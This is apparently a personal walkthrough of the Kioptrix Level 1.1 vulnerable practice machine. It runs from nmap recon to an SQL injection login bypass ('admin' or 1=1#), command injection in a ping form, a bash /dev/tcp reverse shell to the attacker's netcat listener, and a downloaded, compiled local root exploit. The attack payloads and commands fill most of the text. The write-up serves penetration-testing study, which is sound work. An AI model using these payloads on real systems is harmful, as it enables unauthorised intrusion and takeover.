Kioptrix: Level 1.1 (#2)

Find the target IP: nmap 172.16.219.0/24

Nmap scan report for 172.16.219.169
Host is up (0.00019s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:F6:5D:41 (VMware)

Or using netdiscover:

root@kali:# netdiscover -i eth0 -r 172.16.219.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                 

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 172.16.219.1    00:50:56:c0:00:08      1      60  VMware, Inc.                
 172.16.219.2    00:50:56:f6:28:ea      1      60  VMware, Inc.                
 172.16.219.169  00:0c:29:f6:5d:41      1      60  VMware, Inc.                
 172.16.219.254  00:50:56:ef:ff:1d      1      60  VMware, Inc.                

[5]+  Stopped                 netdiscover -i eth0 -r 172.16.219.0/24

Found target: 172.16.219.169

Probe the service now: nmap -sV -sC 172.16.219.169

Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-16 21:23 PST
Nmap scan report for 172.16.219.169
Host is up (0.00015s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            790/udp  status
|_  100024  1            793/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2018-01-17T20:32:45+00:00; +15h08m56s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:F6:5D:41 (VMware)

Host script results:
|_clock-skew: mean: 15h08m56s, deviation: 0s, median: 15h08m56s

Post-scan script results:
| clock-skew: 
|_  15h08m56s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.18 seconds

Navigate to http://172.16.219.169/ in browser, it's a login page. Try username admin' or 1=1# with a random password. It worked!

After logged in, the page provides a ping function, tried command: 127.0.0.1;whoami and got the following output:

The app is vulnerable to command injection.

Run ;cat /etc/*-release and found that the server is CentOS release 4.5 (Final). This version is has a privilege escalation vulnerability and the exploit can be found here: https://www.exploit-db.com/exploits/9542/

Run nc -nvlp 443 on kali vm to create a netcat listener waiting for the inbound shell.

Inject the following command: ;bash -i >& /dev/tcp/172.16.219.165/443 0>&1, where 172.16.219.165 is my kali vm's IP address. (When executing a command on a /dev/tcp/$host/$port pseudo-device file, Bash opens a TCP connection to the associated socket.http://tldp.org/LDP/abs/html/devref1.html\)

root@kali:# nc -nvlp 443
listening on [any] 443 ...
connect to [172.16.219.165] from (UNKNOWN) [172.16.219.169] 32770
bash: no job control in this shell
bash-3.00$ wget https://www.exploit-db.com/download/9542.c
--17:40:34--  https://www.exploit-db.com/download/9542.c
           => `9542.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
ERROR: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
ERROR: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
To connect to www.exploit-db.com insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.
bash-3.00$ wget https://www.exploit-db.com/download/9542.c --no-check-certificate
--17:41:35--  https://www.exploit-db.com/download/9542.c
           => `9542.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/txt]
9542.c: Permission denied

Cannot write to `9542.c' (Success).
bash-3.00$ ls
index.php
pingit.php
bash-3.00$ ls /var/www
cgi-bin
error
html
icons
manual
usage
bash-3.00$ cd /var/tmp
bash-3.00$ wget https://www.exploit-db.com/download/9542.c --no-check-certificate
--17:46:18--  https://www.exploit-db.com/download/9542.c
           => `9542.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,643 (2.6K) [application/txt]

    0K ..                                                    100%  630.14 MB/s

17:46:18 (630.14 MB/s) - `9542.c' saved [2643/2643]

bash-3.00$ ls
9542.c
bash-3.00$ gcc -o exp 9542.c
9542.c:109:28: warning: no newline at end of file
bash-3.00$ ls
9542.c
exp
bash-3.00$ ./exp
sh: no job control in this shell
sh-3.00# whoam i
sh: whoam: command not found
sh-3.00# whoami
root
sh-3.00#

User apache does not have permission to write to /var/www/html folder. So tried to download the expolit to /var/tmp folder. It worked! Then compile and run the exploit. I'm root now.

results matching ""

    No results matching ""